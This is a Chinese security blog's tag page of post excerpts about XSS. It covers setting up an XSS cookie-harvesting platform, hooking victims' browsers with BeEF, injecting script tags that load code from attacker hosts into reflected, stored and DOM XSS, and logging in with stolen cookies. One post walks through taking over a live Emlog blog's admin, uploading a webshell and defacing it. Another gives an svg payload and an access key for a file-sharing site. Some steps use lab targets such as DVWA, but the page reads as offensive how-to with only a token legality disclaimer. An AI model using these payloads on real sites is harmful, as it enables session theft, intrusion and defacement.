网站首页 包含标签 xss 的所有文章

  • XSS平台搭建及利用

    一、下载平台源码、拷贝到我们网站的根目录 https://github.com/anwilx/xss_platform 二、修改相关参数 1、config.php,数据库用户、密码、还有xss平台的访问路径 2、导入sql文件,测试的时候没法导入,所以就手动创建了数据库 新建数据库 打开xssplatform.sql,将里面的sql语句执行一遍 3、更新站点域名,将作者的域名替换,一共有四处 将module模块里"http://xsser.me"替换为"http://www.aiyouxss.com/xss"); 4、修改authtest文件 三、平台利用 1、注册一个账户 2、创建一个项目 3、配置相关信息,根据需要,添加模块 4、复制script里面代码,插入到存在xss漏洞的页面 <script src=http://192.168.139.129/xss/E3vbsa></script> 5、打开xss平台,已获取对方cookie 禁止非法,后果自负 ...

    2021-05-26 613
  • 2021Kali系列 -- XSS漏洞(Beef-xss)

    简介:BeEF-XSS是一款非常强大的web框架攻击平台,集成了许多payload,可以实现许多功能! 一、安装beef-xss 输入beef-xss,提示安装,输入y 二、启动beef-xss 三、访问登陆页面: http://192.168.139.133:3000/ui/panel 四、让目标主机访问存在生成的钩子代码 http://192.168.139.129:81/dvwa/vulnerabilities/xss_r/?name=<script src="http://192.168.139.133:3000/hook.js"></script> 五、获取控制权限 绿色模块:表示模块适用当前用户,并且执行结果对用户不可见 红色模块:表示模块不适用当前用户,有些红色模块也可以执行 橙色模块:模块可用,但结果对用户可见 灰色模块:模块为在目标浏览器上测试过 1、获取cookies 2、获取网页源码 3、让目标主机弹出提示信息 禁止非法,后果自负 ...

    2021-04-16 755
  • HW常见攻击方式 --XSS跨站脚本攻击

    一、XSS介绍 跨站脚本攻击(CrossSiteScripting),为不和层叠样式表(CascadingStyleSheets,CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 二、XSS平台 1、注册登陆账号,没有百分之百的安全,仅供测试交流 https://xssaq.com/xss.php 2、新建项目 3、自动生成要插入的xss代码 <sCRiPt/SrC=https://xssaq.com/dGLM> 三、反射性xss 1、在存在xss漏洞的网站,插入上面生成的xss代码,点击submit 2、刷新xss平台,会发现有一条数据 3、知道了网址,也知道cookie,下面利用工具登录,不用输入账号密码,直接登录了dvwa平台 4、反射性xss是一次性的,也就是说,需要人去点击下面的链接,才能触发该漏洞 http://192.168.1.14/dvwa/vulnerabilities/xss_r/?name=%3CsCRiPt%2FSrC%3Dhttps%3A%2F%2Fxssaq.com%2FdGLM%3E# 四、存储型xss 1、在留言板输入上面生成xss代码 2、只要刷新一下该页面,xss平台就出现一条记录,也就是说只要有人看到该留言板,我们就能获取其cookie 3、利用工具登录 4、存储型xss漏洞,理论是永久的,只要有人浏览到你插入的代码,他的cookie信息就会被拿到。 五、DOM型XSS 1、点击select,发现url中有English, 2、修改url中english为aaa,发现插入了代码中,所以存在dom型xss注入 3、插入生成的xss代码,即可获取对方的cookie 六、工具下载:加入交流群 ...

    2021-03-23 662
  • xssfork-新一代xss探测工具

    xssfork简介 xssfork作为sicklescan的一个功能模块,其开发主要目的是用于检测xss漏洞。 传统的xss探测工具,一般都是采用 payload in response的方式,即在发送一次带有payload的http请求后,通过检测响应包中payload的完整性来判断,这种方式缺陷,很多。 第一:不能准确地检测dom类xss 第二:用类似于requests之类的库不能真正的模拟浏览器 第三:网页js无法交互 怎么解决?如果能够用浏览器代替这个模块,去自动hook是最好的。所幸,我了解到phantomjs,当然现在google浏览器也支持headless模式,类似的,你也可以采用google浏览器去做检测。 原理 对于这类fuzz过程,基本都是预先准备好一些payload,然后加载执行。对于这类io型密集的扫描模型,后端使用多线程就比较适用,但是由于phantomjs你可以理解为一个无界面的浏览器,在加载的时候,其缺陷也比较明显,比较吃内存,用它来发包自然不像requests库轻量。 基本类型机用法: post类型  python xssfork.py -u “xx” -d “xx”  存储型 python xssfork.py -u “xx” -d “xxx” -D  “输出位置” 带cookie python xssfork.py -u “xx” -c “xx” ...

    2020-09-24 1061
  • 树洞外链xss+越权漏洞

    0x00:xss漏洞 上传一张图片,在创建文件名添加xss,公开是分享文件广场。 ><svg/onload=alert(6)> 0x01:越权 (需要条件,可以爆破。32位随机字符) 需要key值。 c74bffaa1cd2a4eda30bd72fe5453bb0 0x02:结束语 爬了一下在用树洞外链的网站,一共有211个网站。...

    2019-07-03 1264
  • [技术教程]Emlog程序储存型XSS漏洞测试

    通过Emlog程序后台编辑器反射XSS漏洞 拿下一个博客站后台并挂黑页~ 这个漏洞呢 我很早之前就发现了 一直都没时间做这期文章 太多事情了 做一件事又忘了一件事 很难受 目前 很多Emlog的模板都已经修复了这个XSS漏洞 一小部分还没修复 所以 今天就利用这个漏洞原理 来拿下一个博客站的后台! 教程开始 首先 检查一下有没有开放注册 如果开放注册的话 就先注册一个账号 注册完成之后在网址后面输入admin 进入到后台 投一篇文章 代码里面插入xss代码 例如这样 接下来就等管理员审核了 审核之后就去xss平台查看反射回来的cookie了 这里我之前获取过一次了 我就不演示了 获取到之后 去上传一个插件 插件文件夹里面必须带一个大马或者小马文件 上传完成之后直接访问/content/plugins/插件名字/你的大马/小马文件 然后就可以上传黑页了 ...

    2019-04-21 1893

联系我们

在线咨询:点击这里给我发消息

QQ交流群:KirinBlog

工作日:8:00-23:00,节假日休息

扫码关注